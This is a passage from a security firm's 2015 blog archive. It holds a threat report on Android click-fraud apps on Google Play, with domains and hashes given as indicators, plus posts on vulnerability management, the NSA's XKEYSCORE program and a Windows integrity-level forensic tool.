28 de julio de 2015
El turco tras los pr0nClickers, sube badware a Google Play por cuarta vez
Durante la semana pasada el turco (probablemente una banda, o una sola persona) que está detrás del malware pr0nClickers consiguió eludir de nuevo las defensas de Google Play y subir de nuevo decenas de apps que visitan enlaces pornográficos entre bambalinas. Durante 2014, esta es la cuarta vez que, modificando ligeramente el código, el atacante consigue burlar las defensas de Google Play. Febrero, primera vez Todo comenzó en febrero. ElevenPaths detectó al menos 32 apps que usaban una viaja técnica en el mundo del Pc, pero no era tan usada entre el badware de Android. Entre las apps simuladas, podíamos encontrar un falso Talking Tom (que estuvo online apenas unas horas) y un "Cut the Rope". En este caso visitaban sitios porno y simulaban el clic en los banners para obtener algún beneficio. Este esquema afectaba también al plan de datos del usuario, puesto que las apps seguirían realizando peticiones a páginas en el "background" sin que la víctima fuese consciente. El atacante operaba desde diciembre, subiendo apps a google Play con la única intención de arrancarse con el sistema y realizar peticiones GET entre bambalinas. Esquema general de funcionamiento de las apps Hicimos en su día una investigación más profunda, y publicamos este artículo. El atacante usaba dominios con nombres supuestamente reales, de forma que era sencillo encontrar hasta su perfil de Facebook. Nombre del registrante, común a la mayoría de dominios registrados El primero dominio usado para los ataques todavía funciona como un "generador de dominios pornográficos". Desde el principio, mostró cierta preferencia por aplicaciones y dominios relacionados con las películas. Click F5... Apps relacionadas con el atacante, encontradas gracias a Tacyt Abril, la segunda vez Avast detectó que al atacante usando de nuevo Dubsmash 2 como app falsa para esparcir estos clickers. La forma en la que funcionaban las apps era muy similar, basándose en las mismas funciones JavaScript y partes de su código, además de direcciones turcas. Pero lo suficientemente diferentes como para burlar a los antivirus y a Google Play de nuevo. Mayo, la tercera vez Esta vez vue Lukas de ESET el que alertó sobre los turcos usando las mismas técnicas y reclamo (Dubsmash 2) para instalar clickers en los dispositivos de las víctimas. El atacante consiguió varios miles de instalaciones. Incluso utilizó los mismos servidores y dominios que en el ataque de febrero, desde donde los sistemas infectados tomaban la información. Un Dubsmash 2 falso usado en mayo Mismos dominios que la primera vez, visto desde Tacyt Julio, la cuarta ola Esta vez, Avast alertó de nuevo sobre el mismo grupo: Turcos, mismos dominios y apps relacionados con películas, mismo Dubsmash 2 como reclamo, mismo código en el JavaScript y en servidores. Pero de nuevo, lo suficientemente diferente para burlar a antivirus y Google Play. Nunca dejó de intentarlo durante junio, pero en julio fue más intenso. El atacante todavía utiliza la misma estructura en sus dominios. Algunos incluso parecen que han sido comprometidos (¿peliculasgratishd.net?). Estos son todos los dominios (no mostramos todas las rutas) relacionados con esta ola de ataques. Ahora son inofensivos, pero esto podría cambiar en cualquier momento, por lo que no se aconseja visitarlos. http://ynk.linuxum.com/ http://kankalar.linuxum.com/z/z5/ http://amas.europeanteenx.com/z/orap/ http://sulale.hitgit.com/com.sulale.dubb/1.png, http://tranquockarafren.peliculasgratishd.net/g/getasite/ http://kum.angelpinkgirls.com/z/z2/ http://cinar.pussyteenx.com/z/z5/ http://kamki.insfollows.com/com.nguyenngocjumraze.suuu/4.png http://phutanjocohare.mobilprn.net/g/getasite/, http://mebk.pantiescock.com/z/z2/, http://komidin.cumshotsex.net/com.komidin.cheatscrim/3.png http://rafta.girlstoyporn.com/z/orap/ http://sulale.hitgit.com/z/z2/ http://kendo.teenpornxx.com/z/orap/ http://fet.asianpornxx.com/z/z5/ http://pupa.romantictube.net/g/getasite/ http://palasandoreki.filmsme.net/z/z2/ Siguen usando el mismo nombre Turco para registrar la mayoría de los dominios. El código (dentro y fuera de las apps, en los servidores), además de usar otras características y fórmulas lo suficientemente parecidas como para atribuirlos a la misma persona. Domino usado en febrero (arriba) y otro usado en julio (abajo) Algunas apps todavía están disponible sen Google Play mientras escribimos estas líneas. Uno de los clickers simulan Temple Run 3, todavía online: https://play.google.com/store/apps/details?id=com.amas.ra Estas son algunas de las apps que hemos encontrado en los últimas días (usando Tacyt y algún clic) que comparten características. Con respecto al primer ataque, han tenido que renunciar a ciertas "comodidades" como por ejemplo, lanzarse cuando se enciende el teléfono. Esto limita el ataque al momento en el que la app se abre, por eso los atacantes intentan añadirles algo de contenido en esta última tanda. Amasra 1;com.amas.ra;f617515837ebe345a68904417d7823974e382e59 Best : Dubsmash;com.kankalar.elma;99cc2f0ff000df5c2e856d40acac1b4dc72e9230 Dubs Mash 2;com.sulale.dubb;459dc9198de2875017885d89e1c04c81301213b3 Panita Kin;com.tranquockarafren.king;f320e227b9742527be37a1c03afe4f2689bb76f0 Cheats for Boom Beach;com.kum.sal;36c4d4c0ca7c2d9e948daa32c20556709984fdba Cinarcik 1;com.cinar.cik;315c57bddee7a2ee5db54fb52215986bc23a9c93 belki yanbak;com.nguyenngocjumraze.suuu;9b0e6c03338db95a86217ea298ae9a50c85c8217 MayHada;com.phutanjocohare.may;9fe6f210fe5209c3d6d97800054e42d80d4e6966 MayHayda;com.phutanjocohare.jat;84af3da99603e9d5586a2278d180d485c74d4068 Cheats for Clash of Clans;com.kankalar.cheats;a0f000baa8246908bdce9feabc2f24530fd8afcb Man Kaptasi;com.phutanjocohare.conc;ed7ed72b9cf1de2cd67ce74d252be5aa7a2c0d35 Cheats for Pou;com.mebk.adli;9d3e6747cf892a7bc7571b1b91da1d14061ad4bb Cheats for Criminal Case;com.komidin.cheatscrim;df5be5567eb7dc2ef8d6f96909ff6dfc29b37d8d Cheats for Hill Climb;com.rafta.chetashill;8d4a009bae65731f10adc0b7fbfb708918579e74 Cheats & Trucos: Gta 5;com.sulale.chetastga;1741e985d4d204da73ee9f2a35622331fe7824c0 Maps & Guide: GTA 5;com.sulale.cimmi;ed388d4dd304c695aba5794d089355febaeb80d8 Followers for Instagram;com.nguyenngocjumraze.takip;5638df53b960a0d2b16f708bba8e46d4dc996f6d C l a s h o f C l a n s 2;com.kankalar.clash2;7552118b7e5f1ef3698579cc48121a6be37aa5f3 Komidin;com.kendo.yako;0695c87554db4a10a7b38df49ecf03f6e20eb4db Fethiye;com.fet.hiye;49c37da0ca94536600cecd8290aba670164ba7a6 Koday;com.pupa.yelken;2e2598c930a448217b6070d934e98735e4c44732 Doganın Güzellikleri 2;com.palasandoreki.hsa2;961923bad0f1a986a142ef5916d57b053e6591ba Doganin Guzellikleri;com.palasandoreki.hsa;193e986d65249a8a04d596b9c13ecfdf0e3dced9 Doganin güzellikleri 3;com.palasandoreki.hsa3;6dad78b0bae7210fcc9335ee671f4514becdb214 Así que esta es la cuarta vez que los atacantes modifican las apps y consiguen subirlas a Google Play. Pero tenemos que ser conscientes de que una vez consiguen eludir a los antivirus mutando el código, este tipo de badware es complejo de detectar porque la forma en la que funciona la app "no es tan sospechoso" (al fin y al cabo, solo visita páginas) y el comportamiento puede ser fácilmente "ocultado" por ejemplo, esperando a ciertos eventos para visitar los sitios porno.. Sergio de los Santos ssantos@11paths.com @ssantosv
27 de julio de 2015
The Turkish behind pr0nClicker, uploads badware to Google Play for the fourth time
During last week, the Turkish (maybe a gang, maybe just a person) behind the pr0nClickers malware got to avoid Google Play defenses and upload again dozens of fake apps that visit pornographic links in the background. During 2015, this is the fourth time that, slightly modifying the code, the attacker gets to fool the defenses in Google Play. February, the first time It all started in February. ElevenPaths detected at least 32 apps that used an old known technique in the PC world, but not so used in Android badware. Between the simulated apps, we could find a fake Talking Tom (that was online for just a few hours) and a "Cut the Rope". In this case they visited ads and porn websites and simulated clicking in the banners, so they got some benefit. This schema affects the data plan of the user, because the apps will keep on requesting pages in the background and the victim will not be aware. The gang or person behind was operating since December, uploading apps to Google Play, with the only intention of booting with the device and making GET requests in the background. App general schema We made a deep research on them, and published this article about it. The attacker used domains with real names. It is easy to find even their Facebook profile. Name of the registrar, common for most of the domains used The first domain used for the attack still works as a "porn domain generator". Since the beginning, it showed some preference for movie related apps, domains, etc. Click F5... Apps related to the attacker, found thanks to Tacyt April, the second time Avast detected the attacker using again Dubsmash 2 as a fake app to spread these clickers. The way the apps worked were very similar, using the same JavaScript functions, part of the code, and Turkish addresses. But different enough to fool not only antivirus but Google Play again. May, the third time This time was Lukas from ESET, who alerted that the Turkish people were using same techniques and decoy (Dubsmash 2) to install clickers in victim's devices. The attacker got a few thousands of downloads and installations. It even used the same domains as in February, where the infected devices got the information from. Fake Dubsmash 2 used during May Same domains as the first time, seen in Tacyt July, the fourth wave This time, Avast alerted again about the same people: Turkish, same "movies related" domains and apps, same Dubsmash 2 as a decoy, same network and JavaScript code. But again, different enough to fool Google Play and antiviruses. He never stopeed trying to upload apps during June, but during July it was more aggressive. The attacker still uses the same structure as the offensive domains. Some of them seem to be compromised domains (peliculasgratishd.net?). These are all the domains (we do not show all the paths) related with this wave of attacks. They seem harmless, but this could change any moment from now. http://ynk.linuxum.com/ http://kankalar.linuxum.com/z/z5/ http://amas.europeanteenx.com/z/orap/ http://sulale.hitgit.com/com.sulale.dubb/1.png, http://tranquockarafren.peliculasgratishd.net/g/getasite/ http://kum.angelpinkgirls.com/z/z2/ http://cinar.pussyteenx.com/z/z5/ http://kamki.insfollows.com/com.nguyenngocjumraze.suuu/4.png http://phutanjocohare.mobilprn.net/g/getasite/, http://mebk.pantiescock.com/z/z2/, http://komidin.cumshotsex.net/com.komidin.cheatscrim/3.png http://rafta.girlstoyporn.com/z/orap/ http://sulale.hitgit.com/z/z2/ http://kendo.teenpornxx.com/z/orap/ http://fet.asianpornxx.com/z/z5/ http://pupa.romantictube.net/g/getasite/ http://palasandoreki.filmsme.net/z/z2/ The attackers keep using the same Turkish name to register most domains. Code (inside and outside the app) keep on using some characteristics and formulas that are common enough to attribute the code to the same people. Domain used in February (up) and domain used in July (down) Some of the files a are still available in Google Play while writing this lines. One of the clickers simulating Temple Run 3, still online: https://play.google.com/store/apps/details?id=com.amas.ra These are some of the apps we have found during these last days so far (using Tacyt and a few clicks) that share the same characteristics. But, since February, they had to refuse to some "commodities" as for example, starting the app with the telephone, which limits the attack to the moment the app is opened... so that is why the attacker is trying to add some content to it lately. Amasra 1;com.amas.ra;f617515837ebe345a68904417d7823974e382e59 Best : Dubsmash;com.kankalar.elma;99cc2f0ff000df5c2e856d40acac1b4dc72e9230 Dubs Mash 2;com.sulale.dubb;459dc9198de2875017885d89e1c04c81301213b3 Panita Kin;com.tranquockarafren.king;f320e227b9742527be37a1c03afe4f2689bb76f0 Cheats for Boom Beach;com.kum.sal;36c4d4c0ca7c2d9e948daa32c20556709984fdba Cinarcik 1;com.cinar.cik;315c57bddee7a2ee5db54fb52215986bc23a9c93 belki yanbak;com.nguyenngocjumraze.suuu;9b0e6c03338db95a86217ea298ae9a50c85c8217 MayHada;com.phutanjocohare.may;9fe6f210fe5209c3d6d97800054e42d80d4e6966 MayHayda;com.phutanjocohare.jat;84af3da99603e9d5586a2278d180d485c74d4068 Cheats for Clash of Clans;com.kankalar.cheats;a0f000baa8246908bdce9feabc2f24530fd8afcb Man Kaptasi;com.phutanjocohare.conc;ed7ed72b9cf1de2cd67ce74d252be5aa7a2c0d35 Cheats for Pou;com.mebk.adli;9d3e6747cf892a7bc7571b1b91da1d14061ad4bb Cheats for Criminal Case;com.komidin.cheatscrim;df5be5567eb7dc2ef8d6f96909ff6dfc29b37d8d Cheats for Hill Climb;com.rafta.chetashill;8d4a009bae65731f10adc0b7fbfb708918579e74 Cheats & Trucos: Gta 5;com.sulale.chetastga;1741e985d4d204da73ee9f2a35622331fe7824c0 Maps & Guide: GTA 5;com.sulale.cimmi;ed388d4dd304c695aba5794d089355febaeb80d8 Followers for Instagram;com.nguyenngocjumraze.takip;5638df53b960a0d2b16f708bba8e46d4dc996f6d C l a s h o f C l a n s 2;com.kankalar.clash2;7552118b7e5f1ef3698579cc48121a6be37aa5f3 Komidin;com.kendo.yako;0695c87554db4a10a7b38df49ecf03f6e20eb4db Fethiye;com.fet.hiye;49c37da0ca94536600cecd8290aba670164ba7a6 Koday;com.pupa.yelken;2e2598c930a448217b6070d934e98735e4c44732 Doganın Güzellikleri 2;com.palasandoreki.hsa2;961923bad0f1a986a142ef5916d57b053e6591ba Doganin Guzellikleri;com.palasandoreki.hsa;193e986d65249a8a04d596b9c13ecfdf0e3dced9 Doganin güzellikleri 3;com.palasandoreki.hsa3;6dad78b0bae7210fcc9335ee671f4514becdb214 So, this is the fourth time the attackers modify the apps and get them in Google Play. But we have to consider that, once you are able to "fool the antivirus" just twisting code, this kind of badware is hard to detect, since the way the apps work is not that "suspicious" ("just visiting sites") and the behavior can be easily "hidden", for example, waiting for some events to start visiting porn sites. Sergio de los Santos ssantos@11paths.com @ssantosv
27 de julio de 2015
Gestión de vulnerabilidades con pentesting persistente, una visión global (y II)
Siguiendo el razonamiento de la entrada anterior, un punto a tener en cuenta en la gestión, es la priorización de los esfuerzos para la mitigación, puesto en algunos casos esta tarea puede ser compleja cuando se detectan un número muy elevado de vulnerabilidades, o dicho de otra forma, ¿por dónde debería comenzar a corregir? Entre los factores para realizar esta priorización se encontrarían: La severidad o gravedad de la vulnerabilidad detectada, junto a la facilidad de explotación de la vulnerabilidad (privilegios necesarios, existencia de exploit,...) Activos afectados: no es lo mismo una vulnerabilidad muy grave en un activo de desarrollo que en un entorno de producción, o con un alto valor para el negocio. La combinación de ambos factores nos proporciona un valor de criticidad y urgencia para la corrección de la misma expresado en términos de negocio ya que, aunque se detectara una vulnerabilidad muy severa, (por ejemplo SQL Injection), pero se tratase de un sistema de desarrollo aislado, la criticidad y la urgencia para la organización no sería la misma que si se detectara sobre un sistema de producción. Por tanto para lograr el éxito de este proceso de gestión de vulnerabilidades, la organización debe aplicar una clasificación y categorización de los activos analizados tanto en términos de ubicación física/lógica (Producción, Preproducción, DMZ X, …), como en términos de negocio (Ventas, CRM, SAP, …, critico para el negocio, etc.). Generalmente casi todas las organizaciones cuentan con una CMDB donde se inventarían los activos con cierto grado de categorización de los mismos, sin embargo no suele disponer de un detalle concreto en cuanto a versiones de software instalado, servicios de red ofrecidos entre otros. El Servicio de Gestión de Vulnerabilidades es capaz de combinar la información contenida en la CMDB de la organización junto a la recogida por las herramientas de análisis de seguridad, facilitando de este modo establecer una priorización de acuerdo a términos de negocio. Para ello almacena en su BBDD información de los activos de la organización detectados por los escáneres de seguridad. Puede completar esta información junto a la de la CMDB de la organización permitiendo crear atributos de una manera personalizada y adaptable a la organización. Por ejemplo, se puede realizar una catalogación de activos en base a unidades de negocio o grupos de activos que permitirá un mayor control y gestión estratégica de los activos. Personalización de campos en el servicio de gestión de vulnerabilidades Gracias a estos campos se puede realizar una rápida identificación de los activos mediante filtros, su posterior edición de forma múltiple y la creación de informes personalizados, cuyo alcance sean unidades de negocio o grupos de activos definidos. Campos de identificación de activos en una compañía Generalmente, las organizaciones llevan a cabo de forma más o menos industrializada ciertos procesos de revisión de seguridad de sus activos, subscripciones de servicios de alertas, uso de escáneres de seguridad, pentesting realizados... y que le proporciona información de forma disgregada, lo que lleva a emplear mucho tiempo para realizar el seguimiento de todas las amenazas detectadas. Por tanto, es importante disponer de un cuadro de mando que permita visualizar de forma unificada las amenazas detectadas en todos los análisis de seguridad realizados. En el servicio de Gestión de vulnerabilidades, la organización podrá visualizar en tiempo real los diferentes tipos de vulnerabilidades que afectan a sus sistemas, pudiendo comprobar el origen y determinar la causa en aras de relacionarlo con los controles más adecuados. Ejemplo de visualización de panel de amenazas En este cuadro de mando se observan las vulnerabilidades que pueden haber sido detectadas mediante proyectos de Pentesting Persistente, pruebas manuales, escáneres de seguridad o una suscripción de alerta de vulnerabilidades. El servicio empela una taxonomía propia basada en estándares como CVE y CWE para homogeneizar la descripción y tipología de los hallazgos y permitir de ese modo una presentación unificada. A través de los diferentes filtros aplicados en el cuadro de mando, de la categorización de los activos, la organización accede de forma ágil al listado y detalle de las vulnerabilidades detectadas para la gestión del ciclo de vida de las vulnerabilidades: Ejemplos de cómo se observan las evidencias El proceso de gestión de vulnerabilidades debe ser continuo y por tanto el tratamiento de las amenazas detectadas deberá ser llevado a cabo en base a la información en tiempo real que se tiene sobre las vulnerabilidades detectadas, en lugar de analizar informes estáticos del resultado de un proyecto. Si este no fuera el caso, es posible que se estén empleando recursos para la mitigación de vulnerabilidades que pudieran haber desaparecido en detrimento de otras nuevas vulnerabilidades que pudieran tener una urgencia mayor para la organización. Esto no quiere decir que el proceso de gestión de vulnerabilidades no deba contar con informes en el que se recojan los hallazgos, sino que estos informes deben ser generados bajo demanda por la organización con la información actualizada desde la BBDD. Informes generados bajo demanda Aparte de disponer de un único formato de informe detallado donde se muestra la información de un proyecto concreto (activos dentro del alcance, ventanas de tiempo, detalle de las pruebas realizadas y vulnerabilidades detectadas), es necesario proporcionar otros tipos de informes que visualicen la evolución del estado de las vulnerabilidades y las diferencias entre las distintas ejecuciones de las pruebas seleccionadas de un proyecto concreto, mostrando los cambios de estado de las vulnerabilidades, así como vulnerabilidades que han aparecido nuevas, nuevos activos y cualquier otro elemento diferente entres las ejecuciones comparadas. Como indicábamos al principio de esta serie de artículos, este proceso de gestión de Vulnerabilidades no debe verse como un proceso aislado con los existentes en la organización y por tanto debe contar con un interfaz que permita la integración con otros sistemas ya que en las organizaciones generalmente para poder realizar una acción que mitiguen una vulnerabilidad suele ser necesario abrir una solicitud en el sistema de ticketing de la organización. La generación y gestión de estas solicitudes suele consumir mucho tiempo y al ser creadas en un sistema orientado a la gestión de actividades de TI, sin un foco en seguridad, es difícil para la organización conocer si las solicitudes gestionadas corresponden a aquellas que en términos de negocio son las que tienen una mayor urgencia. Con una integración bidireccional con el sistema de ticketing, se logra aumentar la eficiencia puesto que se dispondría de un cuadro de mando especializado en seguridad que permitiría gestionar la mitigación de las vulnerabilidades y conocer en todo momento si estas han sido mitigadas. El servicio de Gestión de Vulnerabilidades proporciona una API XML que permite este tipo de integraciones con sistemas externos permitiendo una industrialización de este proceso. * Gestión de vulnerabilidades con pentesting persistente, una visión global (I) Victor Mundilla victor.mundilla@11paths.com
20 de julio de 2015
XKEYSCORE, el ojo que todo lo ve
Ya sabemos que incluir o no prestar atención a la información que publicamos o enviamos a través de distintos canales digitales podría ser interceptada. Pero una buena parte de los usuarios piensa que este problema es exclusivo de las grandes empresas, tecnológicas o propio de entornos gubernamentales que manejan información sensible. ¿Quién se va a interesar por lo banal de la información que manejan un simple usuarios? Un ciudadano de a pie no va a formar parte de ningún guion de una película de James Bond, nuestra información no es atractiva... o puede que, en conjunto, sí. Aunque se conoce el programa desde 2013 a través de "The Guardian", a principios de julio de 2015 se ha publicado una interesante serie en "The Intercept" a partir de la información obtenida por Edward Snowden donde se revela más información sobre el uso y ámbito de operación de las herramientas utilizadas por la NSA y donde se vuelve a hablar del todopoderoso XKEYSCORE y su alcance. El programa XKEYSCORE barre diariamente los correos electrónicos, subidas de imágenes, comentarios a las redes sociales, conversaciones, datos y metadatos, con fines espionaje y vigilancia. Para que nos hagamos una idea, según un documento del año 2009, la recopilación de información de la época podía superar los 20 terabytes de datos diarios y se repartían por más de las 100 ubicaciones de servidores XKEYSCORE repartidos por el mundo. El acceso privilegiado a la fibra que componen la espina dorsal de internet, lo permiten. Esquema de funcionamiento de XKEYSCORE El gobierno norteamericano puso límites a este tipo de espionaje y fueron varios los mensajes anunciando el fin de estos procedimientos pero los escándalos continúan, como confirman diferentes gobiernos europeos que han detectado estar siendo espiados lo cual hace pensar que XKEYSCORE y otros similares a él siguen extrayendo información. ¿Cómo interpretar y atribuir toda la información obtenida y darle un sentido útil en un tiempo razonable? Esta es una labor con la que no solo la NSA ha de enfrentarse, sino que otras muchas empresas y servicios de inteligencia se encuentran con el mismo problema de agilizar la clasificación de esta información. Para conectar el tráfico a un usuario, entre las soluciones más populares se encuentran el uso de las cookies. Son pequeños archivos que almacenan los navegadores con información de los sitios web visitados y que acompañaran al usuario mientras use ese navegador. Con ellas se pueden obtener patrones de comportamiento, frecuencia, seguimiento, preferencias, autenticación etc... pero esto no es suficiente. XKEYSCORE es capaz de extraer y etiquetar metadatos y contenido a partir de los datos en bruto con un efectivo y amplio catálogo de reglas appID, firgerprints y microplugins escritas en GENESIS (un lenguaje propio) y C++ para que posteriormente su equipo de analistas pueda procesar toda la información. Esto permite encontrar fácilmente contraseñas, usuarios y datos de cualquier tipo con solo algunas búsquedas en el sistema XKEYSCORE. Ejemplo de AppIDS y Fingerprints para poder buscar fácilmente en la base de datos sobre Facebook Jonathan Brossard, investigador de seguridad y CEO of Toucan Systems, dijo a The Intercept: "El trabajo que un analista debe realizar para entrar en sistemas ajenos a través de internet se ve reducido a lo ridículo. Hablamos de minutos o segundos. Tan simple como teclear palabras en Google. Una colosal biblioteca privada con información dinámica de nuestras vidas. Ya no es necesario poner cámaras en todas las esquinas para vigilarnos, porque ya proporcionamos nosotros toda la información a través de los canales de comunicación digitales de lo que hacemos. Afortunadamente existen herramientas que ayudan a prevenir al menos la fuga de metadatos y permiten poner algo de freno a esta voraz vulneración de la privacidad. Antonio Bordón antonio.bordón@11paths.com
16 de julio de 2015
Gestión de vulnerabilidades con pentesting persistente, una visión global (I)
Las organizaciones se encuentran expuestas a una gran variedad de ataques (cada vez más sofisticados) mientras que la complejidad en sus infraestructuras y sistemas aumenta. Es crítico para la organización identificar estas amenazas y adoptar contramedidas que permitan su prevención y detección oportuna, además de la gestión adecuada de las vulnerabilidades a las que se encuentra expuesto. No sólo se trata de una ejecución aislada en la detección de vulnerabilidades. Se busca una continuidad en el tiempo. Para ello hay que instaurar un proceso integrado con el resto, de forma que la organización sea capaz de mantener el nivel adecuado de seguridad en sus sistemas y servicios exigido por el entorno en el que se desenvuelve. Muchas organizaciones realizan revisiones puntuales de seguridad y obtienen como resultado más probable un informe con evidencias que demuestren que ha sido posible acceder a los sistemas de información y se aporte unas recomendaciones sobre cómo mitigar las vulnerabilidades detectadas. Además, casi siempre aparecen vulnerabilidades menores que ayudan a preparar ataques más importantes o fallos de configuración en el entorno que permiten finalmente acceder al sistema. Estas revisiones puntuales van a seguir encontrando vulnerabilidades debido a que: el tiempo que pasa entre un proceso de pentesting y otro, un sistema informático sufrirá cientos de cambios provocados por actualizaciones del software de los servidores, el software de los clientes, toda la electrónica de red, etc. También habrá actualizaciones y cambios en el código de los sitios web realizadas por los desarrolladores. Además, el sistema informático habrá crecido en tamaño con la de adición de nuevos dispositivos, y se habrá modificado por el reemplazo de otros. ¿ Cuál es la mejor forma de controlar la seguridad de un sistema teniendo en cuenta el entorno actual tan cambiante? Unido a esto, hay que considerar que una empresa debe hacer frente a ataques maliciosos de individuos que intentan encontrar debilidades para ganar acceso a los sistemas de información. Estos ataques pueden ser llevados a cabo en cualquier momento y los atacantes se ven beneficiados por ese entorno cambiante y auditado "puntualmente". ¿Cómo se pueden preparar los sistemas para hacer frente a estos ataques? La respuesta a estas dos preguntas es a través de la industrialización de estas revisiones hacia un proceso de detección continuo, asociado a unas herramientas que permitan de forma ágil la gestión de las vulnerabilidades detectadas. En este proceso industrializado, detectar las amenazas da paso a que esta misión sea realizada por agentes especializados. Así la organización puede centrarse en el proceso de corrección de la vulnerabilidades y gestión del ciclo de vida de las vulnerabilidades: Desde que se detectan hasta que se valida que estas no son explotables. En este sentido, este proceso puede entenderse como dos bloques claramente diferenciados. Detección de vulnerabilidades Si analizamos cómo actuaría un atacante externo, este no parte de un número concreto de direcciones IP o nombres de servidores (FQDN), sino que generalmente lo único con lo que cuenta es el nombre de la empresa o dominios asociados, por lo que en primer lugar se lleva a cabo una fase inicial de " Descubrimiento" orientada a obtener la visibilidad sobre todos los activos digitales del objetivo. Una vez determinado los activos del objetivo, entra en la " Fase de Análisis" en la que trata de determinar las rutas que puede seguir para acceder a los activos, así como las técnicas usadas para poder lograr usar fallos, vulnerabilidades, malas configuraciones, recabar información sobre los objetivos, etc. Por último, se pasa a la " Fase de Explotación" en la que emplea la información de contexto de las fases anteriores para tratar de explotar vulnerabilidades sobre los activos y configuraciones detectadas, incluso combinando varias vulnerabilidades de severidad menor en aras de obtener una vulnerabilidad de mayor severidad. Para lograr la máxima similitud entre las pruebas de detección y los ataques a los que se verán expuestos los activos de la organización, todas estas fases se han implementado en el Servicio de Pentesting Persistente, empleando para ello la tecnología Faast. Fase de descubrimiento Para lograr tal objetivo, en esta fase Faast lleva a cabo un descubrimiento, que partiendo de un nombre de dominio y empleando fuentes OSINT usadas habitualmente por pentesters y atacantes (buscadores, metadatos, consultas a DNS, servicios como Shodan, Robtext o Archive.org entre otros) de forma continua determina el conjunto de activos de una empresa accesibles desde Internet. Cabe destacar la capacidad de esta fase inicial de descubrimiento, Faast emplea técnicas para determinar los diferentes Virtual Hosts configurados en una dirección IP, de modo que revisaría todas las aplicaciones accesibles desde Internet, algo que en ocasiones se pasa por alto cuando se realiza un análisis basado en direcciones IP o en FQDN. Un atacante va a implementar estas mismas técnicas para buscar puntos de entrada para detectar aplicaciones obsoletas o que escapan al control de la organización. Estas aplicaciones suelen tener un nivel de seguridad menor que el resto de los activos, ya que no se tiene consciencia de su existencia, y por ende tampoco entran dentro de actualizaciones o procedimiento de parcheado. Fase de Análisis En la fase de análisis se trata de determinar las rutas que puede seguir para en la siguiente fase atacar a los objetivos. Estas rutas son los servicios generalmente expuestos en Internet. Suelen evaluar SSH, Mysql, certificados SSL, análisis de cabeceras HTTP, análisis de versiones obsoletas de la infraestructura, evaluación de CMSs (Wordpress, Joomla, Drupal), metadatos, configuraciones inseguras, etc. Cabe destacar la capacidad de Faast de combinar distintas técnicas propias de una atacante simulando de forma real su comportamiento. Ejemplo de esto sería la descargar de los distintos tipos de ficheros jugosos (" juicy files") que previamente han sido detectados en la fase de "Descubrimiento" con el enfoque recursivo. A diferencia de una herramienta de "Análisis de vulnerabilidades" que sólo indicaría la existencia de estos archivos, Faast los descarga para posteriormente analizar el contenido de estos ficheros en busca de información relevante en un proceso de pentesting: rutas a ficheros locales, rutas no indexadas en buscadores, metadatos, información generada por desarrolladores, usuarios, contraseña, ficheros ocultos o perdidos, fugas de datos y de código, etc. En definitiva, Faast realiza un estudio del contenido de los ficheros en busca de información sensible de la empresa. Durante la ejecución de esta fase si se descubren nuevos activos, reinicia el sistema y las mismas fases se ejecutan de forma recursiva, pero esta vez con pruebas adaptadas a la nueva información obtenida. Fase de Explotación La última fase consiste en realizar las pruebas pertinentes de explotación, en base a la información obtenida en la fase de análisis. En esta fase se realiza una explotación controlada de las vulnerabilidades conocidas de los activos y elementos pertenecientes al dominio auditado. Básicamente se pretende simular la acción de un intruso sobre un activo al que se le ha detectado una vulnerabilidad. Continuidad en el tiempo Al concluir el escaneo, el sistema pasa nuevamente a la fase de descubrimiento iniciando un nuevo análisis con el objetivo de detectar otras vulnerabilidades y/o fallos de configuración provocados por actualizaciones del software de los servidores, actualizaciones y cambios en el código de las aplicaciones realizadas por los desarrolladores,... Esquema de análisis con continuidad en el tiempo Gestión de Vulnerabilidades Como ya vimos, en la industrialización del proceso no acaba con la detección de los problemas, sino que continúa con la gestión del ciclo de vida de las vulnerabilidades detectadas. Esta gestión debe comenzar tan pronto son detectadas , huyendo del enfoque tradicional basado en la generación de un informe estático a la finalización de las pruebas de seguridad y finaliza cuando una vulnerabilidad se valida que ya no es explotable. Este seguimiento de estados puede modelarse atendiendo al siguiente flujo de estados, que garantiza la trazabilidad de las acciones realizadas para determinar si una vulnerabilidad se encuentra mitigada. "Workflow" que garantiza la trazabilidad de la gestión de vulnerabilidades Dado que el proceso es continuado en el tiempo (en el que se lanzan varios escaneos) se debe analizar las diferencias entre las distintas ejecuciones de los tests. En este diferencial, existirán nuevas vulnerabilidades y otras que han cambiado el de estado de las mismas, de modo que si una vulnerabilidad no ha vuelto a ser detectada podría identificarse como corregida. Por el contrario, vulnerabilidades que se pensaban mitigadas, ante una nueva detección se consideraría que en realidad no está corregida. Un punto a tener en cuenta en la gestión, es la priorización de los esfuerzos para la mitigación puesto en algunos casos esta tarea puede ser compleja cuando se detectan un número muy elevado de vulnerabilidades, o dicho de otra forma, ¿por dónde debería comenzar a corregir? * Gestión de vulnerabilidades con pentesting persistente, una visión global (I) Victor Mundilla victor.mundilla@11paths.com
14 de julio de 2015
Nueva herramienta: MicEnum, Mandatory Integrity Control Enumerator
En el contexto de la familia de sistemas operativos de Microsoft Windows, Mandatory Integrity Controls (MIC) es una funcionalidad de seguridad que se introdujo en Vista, y que se ha implementado en los posteriores sistemas operativos. Añade niveles de aislamiento basados en integridad de los procesos y objetos. Los niveles de integridad representan el nivel de confianza en un objeto, y puede ser establecido a nivel de ficheros, carpetas, etc. El caso es que es no existe interfaz gráfica para funcionar con los MIC en Windows. MicEnum ha sido creado para solucionar esto, y como una herramienta forense. MicEnum es una simple herramienta gráfica que: Enumera los niveles de integridad de los objetos (ficheros y carpetas) en el disco duro. Enumera los niveles de integridad de las ramas del registro. Ayuda a detectar anomalías en ellos destacando los niveles de integridad diferentes. Permite guardar y restaurar la información en un fichero XML para que pueda ser usado en estudios forenses. Permite establecer y modificar los niveles de integridad gráficamente. MicEnum comprobando los niveles de integridad de una carpeta ¿Cómo funciona la herramienta? La única forma por ahora de mostrar o establecer los niveles de integridad en Windows es usando icacls.exe, una herramienta nativa de línea de comando. No hay forma fácil o estándar de detectar cambios o anomalías. Como ocurre con NTFS, un atacante podría haber modificado los niveles de integridad de un fichero en el sistema para elevar privilegios o desplegar otros ataques, por lo que, observar este tipo de movimientos y anomalías es importante para acciones preventivas o de tipo forense. La herramienta representa los ficheros y carpetas en formato árbol. Su nivel de integridad se muestra en la columna anexa. Si se escanea un directorio, la herramienta comprobará el nivel de integridad de sus hijos y si alguno no es igual al del padre, expandirá esa rama. Si se han expandido varias ramas y se quiere reagrupar los que ya se conoce que no son diferentes, se puede marcar el checkbox de abajo. Esconderá las carpetas que se supone comparten nivel de integridad. MicEnum comprobando los niveles de integridad de las ramas del registro Para establecer nuevos niveles de integridad, se puede usar el menú contextual de nuevo para establecer el nivel deseado. No deben ser 